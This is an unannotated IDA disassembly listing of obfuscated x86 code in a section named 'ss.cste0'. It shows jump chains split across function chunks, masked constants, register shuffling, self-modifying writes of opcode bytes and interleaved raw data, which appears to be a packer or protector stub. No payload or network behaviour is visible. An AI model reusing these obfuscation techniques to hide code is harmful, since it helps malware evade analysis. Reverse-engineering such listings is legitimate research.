loc_48D679:				; DATA XREF: ss.cste0:0048DAECo
		mov	ebx, [ebx]
		xchg	ebx, [esp-0Ch+arg_8]
		push	eax
		pushf
		jmp	loc_48CB62
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D687:				; CODE XREF: ss.cste0:0048C767j
		mov	ebx, [esi]
		xchg	ecx, esi
		adc	ecx, esi
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D68D:				; CODE XREF: sub_48A195:loc_48C750j
		push	offset loc_48B6D5
		jmp	loc_48D73B
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		db 0
byte_48D699	db 52h,	8Bh, 0D0h	; DATA XREF: sub_48D700+1o
		dd 0B8241487h, 48CA9Bh,	0FFDF8AE9h, 487C3FFh, 9F886824h
		dd 0B0E90048h, 68FFFFDFh, 0FA909CFFh, 0FEC6815Eh, 8181A189h
		dd 707C75CEh, 1BC6C1C7h, 11F0E681h, 0B2E955EFh,	0FFFFEDh
		dd 0DD658C0Fh, 0FFFFh, 0DD033187h, 0FFDD58E9h
		db 0FFh, 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D6EB	proc near		; CODE XREF: ss.cste0:0048CA90p
		xchg	eax, [esp+0]
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		push	offset byte_48D593
		jmp	nullsub_583
sub_48D6EB	endp

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================



sub_48D700	proc near		; DATA XREF: sub_48A195+1313o

; FUNCTION CHUNK AT 0048C0E2 SIZE 00000005 BYTES

		push	ebx
		push	offset byte_48D699
		jmp	loc_48C0E2
sub_48D700	endp

; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48E308

loc_48D70C:				; CODE XREF: sub_48E308+9j
		xchg	edi, [esp+0]
		pushf
		push	185F6A2Ah
		xchg	ebp, [esp+8+var_8]
		mov	eax, ebp
		pop	ebp
		xor	eax, 12A76F84h
		and	eax, 9F8D96DEh
		jmp	near ptr dword_48C0B8+18h
; END OF FUNCTION CHUNK	FOR sub_48E308
; ---------------------------------------------------------------------------

loc_48D72C:				; CODE XREF: ss.cste0:0048C303j
		mov	edi, eax
		xchg	edi, [esp]
		push	486F5667h
		call	sub_48E7EE
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D73B:				; CODE XREF: sub_48A195+34FDj
		jmp	nullsub_541
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 4870000h, 45C75824h,	1FCh, 0C8D26800h, 0BF579692h, 48A4BDh
		dd 0FFD378E9h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48D75D:				; CODE XREF: ss.cste0:00489A62j
		xchg	edi, [esp]
		pop	edi
		add	edi, 8C9177F4h
		xchg	edi, [esp]
		jmp	sub_48EAB0
; ---------------------------------------------------------------------------
		align 10h
		dd 2BE85600h
		db 0DFh, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D777:				; CODE XREF: sub_48A195-80Bj
		push	offset byte_48D4CD
		jmp	loc_48D94A
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		db 0C6h
		dd 645E8306h, 58Fh, 0C4A20000h,	51166804h, 81584BE5h, 5C497CC8h
		dd 0DEC6E973h, 0FFFFh, 0E958D885h, 0FFFFFABCh, 4870000h
		dd 58F88B24h, 0FFCD15E8h, 10E0E9FFh, 68000000h,	48AAC9h
		dd 0D83E9h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D04D

loc_48D7CB:				; CODE XREF: sub_48D04D+8j
		or	eax, eax

loc_48D7CD:				; DATA XREF: ss.cste0:loc_48EC65o
		jz	loc_48C46A
		push	eax
		call	sub_48E5CF
; END OF FUNCTION CHUNK	FOR sub_48D04D
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_545. PRESS KEYPAD	"+" TO EXPAND]
		dd 0C30000h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D7E1:				; CODE XREF: sub_48A195+26E3j
		jmp	loc_48C280
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		mov	ebx, [ebp+0]
		ror	ecx, 3
		sub	ebx, 81230B58h
		call	sub_48DE37
		jmp	loc_48D84F
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF58

loc_48D7FE:				; CODE XREF: sub_48CF58:loc_48D440j
		cmp	ecx, 70B3351h
		jmp	loc_48BF61
; END OF FUNCTION CHUNK	FOR sub_48CF58
; ---------------------------------------------------------------------------
		db 2 dup(0), 89h
; ---------------------------------------------------------------------------
		xor	ch, cl
		retn	14h
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E8h
		dd 11B0h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D818:				; CODE XREF: sub_48A195+1007j
		jmp	nullsub_535
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 5Dh,	8Bh, 36h
dword_48D820	dd 682434DBh, 48D8E6h, 0FFF367E9h, 0C78700FFh
					; DATA XREF: ss.cste0:0048E455o

; =============== S U B	R O U T	I N E =======================================



sub_48D830	proc near		; CODE XREF: sub_48C11D+6p
		xchg	eax, [esp+0]
		pop	eax
		push	edi
		jmp	near ptr dword_48A3FC+0Bh
sub_48D830	endp

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================



sub_48D83C	proc near		; CODE XREF: sub_48BFD6:loc_48EBA9p

arg_4		= dword	ptr  8

		xchg	edi, [esp+0]
		pop	edi
		mov	byte ptr [ebx],	0C3h
		pop	ebx
		xchg	edx, [esp-8+arg_4]
		push	edx
		pop	ebp
		pop	edx
		jmp	near ptr dword_48A2E4+0Bh
sub_48D83C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48D84F:				; CODE XREF: ss.cste0:0048D7F7j
		test	ebx, 40000h
		jmp	near ptr loc_48E894+5
; ---------------------------------------------------------------------------
		align 4
		dd 1ECEEA81h, 0F28125D4h, 58E1DE06h, 0FFE4ADE8h, 240487FFh
		dd 0C0FA8158h, 0E933F7D9h, 0FFFFFE5Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D87E:				; CODE XREF: ss.cste0:004898EFj
		popf
		jmp	loc_48AE5D
; ---------------------------------------------------------------------------
		db 2 dup(0)

; =============== S U B	R O U T	I N E =======================================



sub_48D886	proc near		; CODE XREF: sub_48CF06:loc_48BC5Cp
					; ss.cste0:0048DDC1j

; FUNCTION CHUNK AT 0048C464 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CC27 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0048DFA7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048E262 SIZE 00000008 BYTES

		xchg	eax, [esp+0]
		pop	eax
		js	loc_48D0B7
		push	eax
		jmp	loc_48E262
sub_48D886	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dw 0C300h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D898:				; CODE XREF: sub_48A195:loc_48E1ADj
		jmp	nullsub_542
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 0FFFFFB19h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D8A4:				; CODE XREF: sub_48A195:loc_48B8F2j
		mov	byte ptr [edi],	0FFh
		pop	edi
		mov	eax, [ebp-4]
		push	ecx
		mov	ecx, edi
		jmp	loc_48BF27
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		xchg	ebx, [esp]
		pop	ebx
		popf
		xchg	edi, [esp]
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D8BF:				; CODE XREF: ss.cste0:0048DD7Cj
		jmp	locret_48B15D
; ---------------------------------------------------------------------------
		dd 108F0000h, 0FFEF80E8h, 0E6BA52FFh, 0E9004897h, 0FFFFCB54h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D8D9:				; CODE XREF: sub_48A195:loc_48BD4Dj
		jnz	loc_48D006
		jmp	loc_48E732
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 0D0FF0000h, 0FFBFAEE9h, 520000FFh, 3E685A55h, 0E90048E7h
		dd 0FFFFC710h
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D8FE:				; CODE XREF: ss.cste0:loc_48E508j
		mov	byte ptr [ebx],	0Fh
		pop	ebx
		xchg	edx, [esp]
		mov	ecx, edx
		jmp	near ptr dword_489BAC+32h
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48D90E:				; CODE XREF: ss.cste0:0048C38Cj
		xchg	edi, [esp]
		pop	edi
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		jmp	loc_48E948

; =============== S U B	R O U T	I N E =======================================



sub_48D91D	proc near		; CODE XREF: ss.cste0:0048EC5Fp
		xchg	ecx, [esp+0]
		pop	ecx
		push	ebx
		push	0A81A38B7h
		pop	ebx
		or	ebx, 125845AFh
		rol	ebx, 7
		call	sub_48CCBF

loc_48D936:				; DATA XREF: sub_48C2E9:loc_48C7BCo
		push	ecx
		push	1311CB91h
		pop	ecx
		add	ecx, 0E8C98817h
		jmp	loc_48B6B6
sub_48D91D	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_568. PRESS KEYPAD	"+" TO EXPAND]
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D94A:				; CODE XREF: sub_48A195+35E7j
		jmp	locret_48A762
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 10h
		db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_544. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D952:				; CODE XREF: sub_48A195+393Cj
		mov	byte ptr [eax],	0F6h
		xchg	ecx, [esp+0]
		mov	eax, ecx
		pop	ecx
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	near ptr dword_48A610+1Ah
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48D968:				; CODE XREF: sub_48A195+1586j
		mov	byte ptr [edx],	87h
		pop	edx
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp+14h+var_14]
		and	esi, 2A9126BBh
		jmp	loc_48C484
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
word_48D97E	dw 1487h		; DATA XREF: sub_48A195+C72o
		dd 0C015FF24h, 570045D0h, 0B5D36E68h, 0D686E9D9h, 6800FFFFh
		dd 9506D3CAh, 20A8A0Fh,	34E90000h, 0FFFFC4h, 0F711E6C1h
		dd 3A43EFC3h, 0F3F0E968h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E016

loc_48D9B2:				; CODE XREF: sub_48E016+13j
		or	edi, 235C265Ch
		add	edi, 9E4BB2D7h
		add	edx, edi
		pop	edi
		jmp	loc_48B83F
; END OF FUNCTION CHUNK	FOR sub_48E016
; ---------------------------------------------------------------------------
		align 4
		and	esi, 5C280950h

; =============== S U B	R O U T	I N E =======================================



sub_48D9CE	proc near		; CODE XREF: sub_48A195+169Ep

arg_0		= dword	ptr  4

		xchg	edi, [esp+0]
		pop	edi
		mov	esp, ebp

loc_48D9D4:				; DATA XREF: ss.cste0:0048991Co
		xchg	ecx, [esp-4+arg_0]
		mov	ebp, ecx
		pop	ecx
		jmp	nullsub_534
sub_48D9CE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_48D9DF:				; CODE XREF: ss.cste0:0048D179p
		xchg	edx, [esp]
		pop	edx
		call	ds:dword_45D0C0	; ExitProcess
		call	near ptr dword_48BEFC+1
; ---------------------------------------------------------------------------
		dw 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_583. PRESS KEYPAD	"+" TO EXPAND]
		db 2 dup(0), 0E9h
		dd 0FFFFCAC4h, 12C9E9h,	9E0F6800h, 0ADE90048h, 0FFFFCDh
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DA09:				; CODE XREF: sub_48A195+4516j
		jmp	nullsub_550
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dw 6800h
		dd offset loc_48EC2E
		dd 0FFCD9EE9h, 8B0000FFh, 0BFEBE9DDh, 0FFFFh, 0D08B525Fh
		dd 9C241487h, 2C373068h, 0C60FE9ACh
		db 2 dup(0FFh),	0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48E621

loc_48DA37:				; CODE XREF: sub_48E621+Ej
		and	ecx, 3B570F4Ah
		add	ecx, 0C538DC39h

loc_48DA43:				; DATA XREF: sub_48A195:loc_48B8F7o
		xchg	ecx, [esp+0]
		push	edx
		push	0A6A281ABh
		pop	edx
		and	edx, 381C952h
		add	edx, 750A7FDCh
		jmp	loc_48E7BE
; END OF FUNCTION CHUNK	FOR sub_48E621
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48DAFF

loc_48DA5F:				; CODE XREF: sub_48DAFF+19j
		push	offset dword_48EB3C
		jmp	nullsub_558
; END OF FUNCTION CHUNK	FOR sub_48DAFF
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48DA6E:				; CODE XREF: ss.cste0:0048BC05j
		retn
; ---------------------------------------------------------------------------
		align 10h
		dd 384E900h, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DA78:				; CODE XREF: sub_48A195+DFEj
		jmp	loc_48C1FE
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 2 dup(0), 89h
; ---------------------------------------------------------------------------
		jge	short $+2
		jmp	loc_48E7AF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_543. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48DA88:				; CODE XREF: ss.cste0:0048D58Cj
		jmp	near ptr dword_48C644+24h
; ---------------------------------------------------------------------------
		jmp	locret_48A424
; ---------------------------------------------------------------------------
		align 4

loc_48DA94:				; DATA XREF: sub_48A195:loc_48CECFo
		mov	byte ptr [ebx],	87h
		pop	ebx

loc_48DA98:				; CODE XREF: ss.cste0:0048E446j
		or	esi, 5E5BFEFFh
		and	esi, 0C6716718h
		test	esi, 1000h
		jmp	loc_48B47D
; ---------------------------------------------------------------------------
		align 10h
		dd 87241C87h, 0D88B2404h, 0F2736858h, 8158445Ch, 190448C8h
		dd 0F1A8E980h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

locret_48DACA:				; CODE XREF: ss.cste0:0048D54Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DACB:				; CODE XREF: sub_48A195+1527j
		jge	near ptr dword_489D78+26h
		jmp	loc_48D952
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		not	edi
		jmp	loc_48ED1E
; ---------------------------------------------------------------------------
		align 10h
		xor	ebx, 0B4BD0557h
		jmp	sub_48E621
; ---------------------------------------------------------------------------
		push	edx
		mov	edx, offset loc_48D679
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DAF1:				; CODE XREF: sub_48A195:loc_48B4D2j
		jmp	loc_48A6F0
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

loc_48DAF6:				; CODE XREF: ss.cste0:loc_48DCF6j
		mov	byte ptr [ecx],	0C7h
		call	sub_48C70A
; ---------------------------------------------------------------------------
		db 0

; =============== S U B	R O U T	I N E =======================================



sub_48DAFF	proc near		; CODE XREF: sub_48A195+9E4p

; FUNCTION CHUNK AT 0048DA5F SIZE 0000000A BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0D4E3C6BFh
		pop	edi
		sub	edi, 3804D938h
		rol	edi, 1Ch
		or	edi, 0B75C30B2h
		jmp	loc_48DA5F
sub_48DAFF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DB1F:				; CODE XREF: sub_48A195+D92j
		xchg	ecx, [esp+10h+var_10]
		jmp	loc_48D1E3
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 68h
		dd offset dword_48BE08+2Ch
		dd 0D62E9h, 1F890000h, 8157D5F7h, 50DEA5C0h, 24048725h
		dd 0FFC989E9h, 0A93C68FFh, 81589FE0h, 0B17FB9F0h, 0ED62E93Ah
		dd 0C181FFFFh, 0CD681F75h, 0FFEF49E9h, 0E38100FFh, 0CF89D46Ch

; =============== S U B	R O U T	I N E =======================================



sub_48DB68	proc near		; CODE XREF: sub_48C0E7+ADEp
		xchg	ecx, [esp+0]
		pop	ecx
		push	48AB81h
		jmp	locret_48AB7E
sub_48DB68	endp

; ---------------------------------------------------------------------------
		dw 0D71Bh
		dd 0ECE9038Bh, 0FFFFDCh, 241C8700h, 8D00C65Bh, 0BC196858h
		dd 1AE90048h, 11h, 0F8E900C3h, 0FFFFFDh
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DB9C:				; CODE XREF: sub_48A195+41j
		test	edx, 5910C908h
		jmp	loc_48E166
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

locret_48DBA7:				; CODE XREF: ss.cste0:0048DDD7j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DBA8:				; CODE XREF: sub_48A195+1450j
		jmp	near ptr dword_48B1B4+17h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		add	eax, edi
		jmp	sub_48A17A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DBB5:				; CODE XREF: sub_48A195:loc_48E33Dj
		push	0BBF4838Eh
		pop	esi
		and	esi, 0FC46B2A7h
		rol	esi, 0Ah
		xor	esi, 272100BBh
		add	eax, esi
		pop	esi
		jmp	loc_48D439
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
		dd 87240487h, 0C28B2414h, 0C830F5Ah, 0E9FFFFFDh, 0FFFFD2B8h
		db 0, 0C3h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C2E9

loc_48DBEA:				; CODE XREF: sub_48C2E9+Cj
		jmp	loc_48C7BC
; END OF FUNCTION CHUNK	FOR sub_48C2E9
; ---------------------------------------------------------------------------
		align 10h
		dd 0FFDB81E9h, 890000FFh, 24048733h, 241C8758h,	0D0C015FFh
		dd 6F680045h, 0E90048ACh, 0FFFFE78Dh, 3207E881h, 0C081D718h
		dd 923174F1h, 0EC6FF081h, 0C0818843h, 0DFBC0AAEh, 0FFFB77E9h
		dd 3C8700FFh, 6895F24h,	138E8h
		db 3 dup(0)
; ---------------------------------------------------------------------------

loc_48DC3B:				; CODE XREF: ss.cste0:0048D514j
		jmp	near ptr dword_48A230+1
; ---------------------------------------------------------------------------
		dd 0E2BE900h, 0C1000000h, 0A5E907C7h, 7
; ---------------------------------------------------------------------------

loc_48DC50:				; CODE XREF: ss.cste0:0048A095j
		xchg	edi, [esp]
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		push	662471EEh
		xchg	edx, [esp]
		jmp	loc_48BAA9
; ---------------------------------------------------------------------------
		dw 0C100h
; ---------------------------------------------------------------------------
		retn	890Eh
; ---------------------------------------------------------------------------
		db 30h
; ---------------------------------------------------------------------------
		jmp	sub_48E4E6
; ---------------------------------------------------------------------------
		db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_533. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DC74:				; CODE XREF: sub_48A195+1143j
		jmp	near ptr byte_489D44+1
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_566. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF58

loc_48DC7B:				; CODE XREF: sub_48CF58:loc_48BF61j
		jge	near ptr dword_489A68+0E0h
		js	loc_48C6B2
		jbe	near ptr dword_48A610+46h
		xchg	ebx, esi
		mov	ecx, esi
		jmp	near ptr dword_489A68+0DDh
; END OF FUNCTION CHUNK	FOR sub_48CF58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DC96:				; CODE XREF: sub_48A195+187j
		push	edi
		push	0F82DD41Ah
		pop	edi
		rol	edi, 18h
		or	edi, 989CC785h
		add	edi, 654BC9E7h
		jmp	loc_48B2F9
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2

locret_48DCB2:				; CODE XREF: ss.cste0:0048C54Ej
		retn
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DCB5:				; CODE XREF: sub_48A195+13CDj
		jmp	loc_48C559
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DCBB:				; CODE XREF: sub_48A195+1179j
		or	esi, 69486CE7h
		xor	esi, 0AF8AC467h
		add	esi, 2F99C578h
		test	eax, esi
		pop	esi
		jmp	near ptr dword_48AD24+16h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 68D50300h, 48A7AAh, 0FFC005E9h, 0F0000FFh, 0D3A85h
		dd 0BC22E900h, 0C300FFFFh
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_48DCF6:				; CODE XREF: ss.cste0:0048E0D0j
		jmp	loc_48DAF6
; ---------------------------------------------------------------------------
		align 4
		dd 24148700h, 18C6815Ah, 9D82D2A2h, 0FFBC4DE8h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

; =============== S U B	R O U T	I N E =======================================



sub_48DD0E	proc near		; CODE XREF: sub_48A195+2A5Ep
		xchg	eax, [esp+0]
		xchg	ebx, [esp+0]
		mov	eax, ebx
		pop	ebx
		jmp	loc_48A4DE
sub_48DD0E	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 0E9D58700h, 21Fh, 367AE981h,	0D80B9BBEh
; ---------------------------------------------------------------------------
		popf

loc_48DD2D:				; CODE XREF: ss.cste0:loc_48E65Cj
		xor	edi, 69820CC1h
		test	ebx, edi
		pop	edi
		jmp	near ptr dword_48AB28+7
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_559. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48CF06

loc_48DD3D:				; CODE XREF: sub_48CF06+1B7j
		jmp	locret_48B8D8
; END OF FUNCTION CHUNK	FOR sub_48CF06
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------

loc_48DD43:				; DATA XREF: sub_48A195+A42o
		mov	byte ptr [ecx],	9Dh
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		and	ebx, 68410D49h
		jmp	loc_48E05B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DD57:				; CODE XREF: sub_48A195+88Dj
		mov	byte ptr [edi],	8Bh
		pop	edi
		push	48C492h
		jmp	loc_48E691
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 2
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DD66:				; CODE XREF: sub_48A195+7D3j
		jnz	loc_48C99C
		jmp	near ptr dword_489788+0F3h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------

loc_48DD71:				; CODE XREF: ss.cste0:00489C12j
		xchg	edi, [esp]
		pop	edi
		pop	esi
		pushf
		push	offset loc_48C267
		jmp	loc_48D8BF
; ---------------------------------------------------------------------------
		align 2

loc_48DD82:				; CODE XREF: ss.cste0:0048C9D3j
		mov	esi, 7293BE32h
		jmp	sub_48E325
; ---------------------------------------------------------------------------
		dd 47C7C081h, 0C50358E8h, 6BB4C081h, 8B4FE2h
		db 0B7h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DD9D:				; CODE XREF: sub_48A195:loc_48E166j
		call	sub_48BEE6

loc_48DDA2:				; CODE XREF: sub_48A195+95j
		jmp	loc_48D2AA
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DDA8:				; CODE XREF: sub_48A195+2096j
		mov	byte ptr [edx],	85h
		pop	edx
		rol	ecx, 5
		push	offset dword_48CC0C
		jmp	nullsub_549
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		ja	loc_48E2C1
		mov	[eax], ebx
		jmp	sub_48D886
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_553. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DDC7:				; CODE XREF: sub_48A195+42EEj
		jmp	loc_48B477
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48BEE6

loc_48DDCD:				; CODE XREF: sub_48BEE6+6E4j
		jmp	loc_48B720
; END OF FUNCTION CHUNK	FOR sub_48BEE6
; ---------------------------------------------------------------------------
		push	offset dword_48B31C
		jmp	locret_48DBA7
; ---------------------------------------------------------------------------
		dd 75890000h, 0E3E95E00h, 0FFFFE5h, 0FFC540E8h
		db 0FFh
; ---------------------------------------------------------------------------

loc_48DDED:				; CODE XREF: ss.cste0:0048BC12j
		jmp	near ptr dword_489E38+6Bh
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DDF3:				; CODE XREF: sub_48A195+BEBj
		jmp	near ptr dword_489788+0B3h
; END OF FUNCTION CHUNK	FOR sub_48A195
; ---------------------------------------------------------------------------
		dd 685D0000h, 48B5D4h, 0FFD9CAE9h
		db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_561. PRESS KEYPAD	"+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_48DE06	proc near		; CODE XREF: sub_48A195+5D5j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0048C1CF SIZE 0000001D BYTES

		xchg	edi, [esp+0]
		pop	edi
		xchg	ebp, [esp-4+arg_0]
		push	32B1C40Fh
		pop	esi
		jmp	loc_48C1CF
sub_48DE06	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		dd 3BE9F003h, 0FFFFE8h,	0E3685600h, 5EB09745h, 64E2C681h
		dd 5BE97F2Ch, 0FFFFE2h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DE35:				; CODE XREF: sub_48A195+100Fj
		mov	edx, ecx
; END OF FUNCTION CHUNK	FOR sub_48A195

; =============== S U B	R O U T	I N E =======================================



sub_48DE37	proc near		; CODE XREF: ss.cste0:0048D7F2p
		xchg	eax, [esp+0]
		xchg	esi, [esp+0]
		mov	eax, esi
		jmp	near ptr dword_489788+57h
sub_48DE37	endp

; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

locret_48DE46:				; CODE XREF: ss.cste0:loc_48CB2Cj
		retn
; ---------------------------------------------------------------------------
		align 4
dword_48DE48	dd 2D587868h, 0F3815BCDh, 0D75072E0h, 0B734EB81h, 0FB8148F9h
					; DATA XREF: ss.cste0:loc_48E6B2o
		dd 1D7A40E9h, 0FFC735E9h, 506800FFh, 5FD5E7E2h,	34DAEF81h
		dd 0C78112F0h, 3D50F479h, 0FFE659E9h, 9D0000FFh, 0C981D387h
		dd 7C46B02Bh, 0B729F181h, 0E981317Bh, 65B0CCD8h, 0FFE934E8h
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]
; START	OF FUNCTION CHUNK FOR sub_48A195

loc_48DE9A:				; CODE XREF: sub_48A195:loc_48B7E9j
		mov	esi, [esi]
		pushf
		call	loc_48A1B2
